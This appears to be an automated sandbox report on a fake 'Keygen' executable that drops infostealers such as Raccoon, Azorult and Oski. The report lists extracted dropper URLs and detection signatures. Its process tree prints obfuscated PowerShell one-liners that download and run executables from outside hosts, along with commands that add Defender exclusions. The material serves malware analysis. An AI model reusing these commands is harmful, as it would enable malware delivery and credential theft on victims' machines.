Overview

overview

10

Static

static

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

8

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

201001-nyh...я.exe

windows7_x64

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

8

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

8

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

8

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

8

201001-nyh...я.exe

windows7_x64

8

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

8

201001-nyh...я.exe

windows10_x64

8

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

8

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

8

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...en.exe

windows7_x64

10

201001-nyh...en.exe

windows10_x64

10

Resubmissions

02-10-2020 21:14

201002-pjxdl9y6a6 10

01-10-2020 20:51

201001-e45lwcxsnn 10

01-10-2020 20:51

201001-fhxddb9gwe 10

01-10-2020 20:51

201001-ts8hns28ea 10

01-10-2020 20:51

201001-v1kt3kgljx 10

01-10-2020 20:51

201001-d2fbtjzv4s 10

01-10-2020 20:51

201001-cgj9prs442 10

01-10-2020 20:49

201001-t1jnpvwcgx 10

Analysis

  • max time kernel
    151s
  • max time network
    149s
  • platform
    windows7_x64
  • resource
    win7
  • submitted
    01-10-2020 20:51

General

  • Target

    201001-nyhbt4p25j_pw_infected/Keygen — копия (119) — копия.exe

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://zxvbcrt.ug/zxcvb.exe

exe.dropper

http://zxvbcrt.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhHT

exe.dropper

http://bit.do/fqhHT

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhJv

exe.dropper

http://bit.do/fqhJv

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://pdshcjvnv.ug/zxcvb.exe

exe.dropper

http://pdshcjvnv.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhJD

exe.dropper

http://bit.do/fqhJD

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://rbcxvnb.ug/zxcvb.exe

exe.dropper

http://rbcxvnb.ug/zxcvb.exe

Extracted

Path

C:\Users\Admin\AppData\LocalLow\machineinfo.txt

Family

raccoon

Ransom Note
[Raccoon Stealer] - v1.5.13-af-hotfix Release Build compiled on Mon Jul 6 14:33:02 2020 Launched at: 2020.10.02 - 03:33:05 GMT Bot_ID: BAE8C589-5DA1-4C62-BE46-F8D74908CB8C_Admin Running on a desktop =R=A=C=C=O=O=N= - Cookies: 0 - Passwords: 0 - Files: 0 System Information: - System Language: English - System TimeZone: -0 hrs - IP: 154.61.71.51 - Location: 37.750999, -97.821999 | ?, ?, United States (?) - ComputerName: AVGLFESB - Username: Admin - Windows version: NT 6.1 - Product name: Windows 7 Professional - System arch: x64 - CPU: Persocon Processor 2.5+ (2 cores) - RAM: 2047 MB (445 MB used) - Screen resolution: 1280x720 - Display devices: 0) Standard VGA Graphics Adapter ============

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers.

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • Contains code to disable Windows Defender 2 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Oski

    Oski is an infostealer targeting browser data, crypto wallets.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • Raccoon log file 1 IoCs

    Detects a log file produced by the Raccoon Stealer.

  • ModiLoader First Stage 2 IoCs
  • ModiLoader Second Stage 1 IoCs
  • Blocklisted process makes network request 6 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 25 IoCs
  • Loads dropped DLL 36 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops desktop.ini file(s) 1 IoCs
  • Suspicious use of SetThreadContext 7 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 3 IoCs
  • Kills process with taskkill 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 4 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 17 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — копия (119) — копия.exe
    "C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — копия (119) — копия.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1320
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\2E03.tmp\start.bat" "C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — ????? (119) — ?????.exe""
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1372
      • C:\Users\Admin\AppData\Local\Temp\2E03.tmp\Keygen.exe
        Keygen.exe
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetWindowsHookEx
        PID:1816
      • C:\Windows\SysWOW64\mshta.exe
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\2E03.tmp\m.hta"
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of WriteProcessMemory
        PID:1864
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iguyoamkbvf $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iguyoamkbvf umgptdaebf $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|umgptdaebf;iguyoamkbvf rsatiq $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhIVA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);rsatiq $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
          4⤵
          • Blocklisted process makes network request
          • Loads dropped DLL
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1948
          • C:\Users\Public\qoc.exe
            "C:\Users\Public\qoc.exe"
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of SetThreadContext
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of SetWindowsHookEx
            PID:2560
            • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
              "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of SetThreadContext
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of SetWindowsHookEx
              PID:2620
              • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                7⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Checks processor information in registry
                PID:2764
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c taskkill /pid 2764 & erase C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe & RD /S /Q C:\\ProgramData\\987188508978368\\* & exit
                  8⤵
                    PID:2620
                    • C:\Windows\SysWOW64\taskkill.exe
                      taskkill /pid 2764
                      9⤵
                      • Kills process with taskkill
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2932
              • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of SetThreadContext
                • Suspicious behavior: MapViewOfSection
                • Suspicious use of SetWindowsHookEx
                PID:2664
                • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                  "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                  7⤵
                  • Executes dropped EXE
                  PID:2732
              • C:\Users\Public\qoc.exe
                "C:\Users\Public\qoc.exe"
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Drops desktop.ini file(s)
                • Modifies system certificate store
                PID:2712
                • C:\Users\Admin\AppData\Local\Temp\foYJbC9HQr.exe
                  "C:\Users\Admin\AppData\Local\Temp\foYJbC9HQr.exe"
                  7⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2332
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
                    "Powershell" Add-MpPreference -ExclusionPath '"C:\Users\Admin\AppData\Local\Temp\foYJbC9HQr.exe"'
                    8⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2900
                • C:\Users\Admin\AppData\Local\Temp\Caxi8CEgm0.exe
                  "C:\Users\Admin\AppData\Local\Temp\Caxi8CEgm0.exe"
                  7⤵
                  • Executes dropped EXE
                  PID:1036
                  • C:\Windows\SysWOW64\Notepad.exe
                    "C:\Windows\System32\Notepad.exe"
                    8⤵
                      PID:2492
                  • C:\Users\Admin\AppData\Local\Temp\210wKdeNEi.exe
                    "C:\Users\Admin\AppData\Local\Temp\210wKdeNEi.exe"
                    7⤵
                    • Executes dropped EXE
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of SetWindowsHookEx
                    PID:2452
                    • \??\c:\windows\SysWOW64\cmstp.exe
                      "c:\windows\system32\cmstp.exe" /au C:\Windows\temp\vs4jecqg.inf
                      8⤵
                        PID:2572
                    • C:\Users\Admin\AppData\Local\Temp\Tz4hYS6554.exe
                      "C:\Users\Admin\AppData\Local\Temp\Tz4hYS6554.exe"
                      7⤵
                      • Executes dropped EXE
                      • Windows security modification
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:600
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        "powershell" Get-MpPreference -verbose
                        8⤵
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2428
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Public\qoc.exe"
                      7⤵
                        PID:2504
                        • C:\Windows\SysWOW64\timeout.exe
                          timeout /T 10 /NOBREAK
                          8⤵
                          • Delays execution with timeout.exe
                          PID:2008
              • C:\Windows\SysWOW64\mshta.exe
                "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\2E03.tmp\m1.hta"
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:1788
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iyhxbstew $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iyhxbstew bruolc $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bruolc;iyhxbstew cplmfksidr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3p4dmJjcnQudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);cplmfksidr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                  4⤵
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1628
              • C:\Windows\SysWOW64\timeout.exe
                timeout 1
                3⤵
                • Delays execution with timeout.exe
                PID:1776
              • C:\Windows\SysWOW64\mshta.exe
                "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\2E03.tmp\b.hta"
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:1964
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
